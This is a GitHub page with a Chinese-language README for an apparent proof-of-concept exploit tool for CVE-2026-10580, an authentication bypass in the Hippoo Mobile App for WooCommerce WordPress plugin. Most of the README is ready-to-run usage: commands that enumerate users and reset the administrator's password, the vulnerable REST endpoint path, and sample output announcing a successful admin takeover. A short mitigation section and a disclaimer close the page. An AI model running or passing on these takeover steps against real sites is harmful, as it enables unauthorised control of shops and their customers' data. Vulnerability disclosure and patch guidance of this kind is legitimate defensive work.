0xgh057r3c0n/CVE-2026-10580

GitHub: 0xgh057r3c0n/CVE-2026-10580

针对 Hippoo WooCommerce 插件身份验证绕过漏洞(CVE-2026-10580)的 PoC 利用工具,可枚举用户并重置管理员密码实现账户接管。

Stars: 0 | Forks: 0

WordPress

# WordPress - Hippoo Mobile App for WooCommerce <= 1.9.4 - 身份验证绕过导致管理员账户接管 [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT) ## 概述 该工具是针对 **CVE-2026-10580** 的概念验证 exploit,这是一个影响 **Hippoo Mobile App for WooCommerce** WordPress 插件(版本 <= 1.9.4)的身份验证绕过漏洞。该漏洞允许未经身份验证的攻击者重置任何用户(包括管理员)的密码,从而导致网站被完全接管。 **⚠️ 重要提示:** 本工具仅供**授权的安全测试和教育目的**使用。未经授权对您不拥有或未获得明确测试许可的系统使用本工具是非法的。 ## 功能 - 通过存在漏洞的 REST API endpoint 枚举所有 WordPress 用户 - 重置指定用户 ID(默认:管理员 ID 1)的密码 - 带彩色输出的简单命令行界面 - 提供在测试环境中禁用 SSL 验证的选项 ## 用法 ### 前置条件 - Python 3.6+ - `requests` 库 安装依赖项: ``` pip install requests ``` ### 基本命令 ``` python3 exploit.py -t https://target-site.com -p NewPassword123! ``` ### 选项 | 参数 | 描述 | |----------|-------------| | `-t, --target` | 目标 WordPress 站点 URL(例如,`https://example.com`) | | `-p, --password` | 为管理员账户设置的新密码 | | `-i, --id` | 要接管的用户 ID(默认:1) | | `-k, --insecure` | 跳过 SSL 证书验证 | | `--no-banner` | 隐藏 ASCII banner | ### 示例 **使用默认管理员 ID (1) 并启用 SSL 验证执行 exploit:** ``` python3 exploit.py -t https://example.com -p PwnedCVE2026!! ``` **针对特定的用户 ID 并禁用 SSL 验证:** ``` python3 exploit.py -t https://example.com -p NewPass123 -i 2 -k ``` **运行时不显示 banner:** ``` python3 exploit.py -t https://example.com -p NewPass123 --no-banner ``` ## 示例输出 ``` [+] Found 3 user(s) - User ID: 1 | Username: admin | Role: administrator - User ID: 2 | Username: editor_user | Role: editor - User ID: 3 | Username: subscriber1 | Role: subscriber ╔══════════════════════════════════════════════════════════════╗ ║ ADMIN TAKEOVER SUCCESSFUL ║ ╚══════════════════════════════════════════════════════════════╝ Target: https://example.com Login: https://example.com/wp-admin Username: admin Password: PwnedCVE2026!! ``` ## 缓解措施 如果您正在使用 Hippoo 插件,请**立即将其更新**至已修复的版本(>1.9.4)。此外: - 定期审查用户账户是否存在未经授权的更改 - 监控日志中针对 `/wp-json/wc-hippoo/v1/ext/wp/v2/users` 的意外 API 请求 - 考虑在不需要时限制对 WordPress REST API 的访问 ## 许可证 本项目基于 **MIT License** 授权。详情请参阅 [LICENSE](LICENSE) 文件。 ## 作者 **0xgh057r3c0n** ## 免责声明 作者不对本工具的任何滥用行为负责。请负责任地使用,且仅对您拥有或已获得明确测试许可的系统使用。
标签:PoC, Python, StruQ, WooCommerce, WordPress, 无后门, 暴力破解, 认证绕过, 逆向工具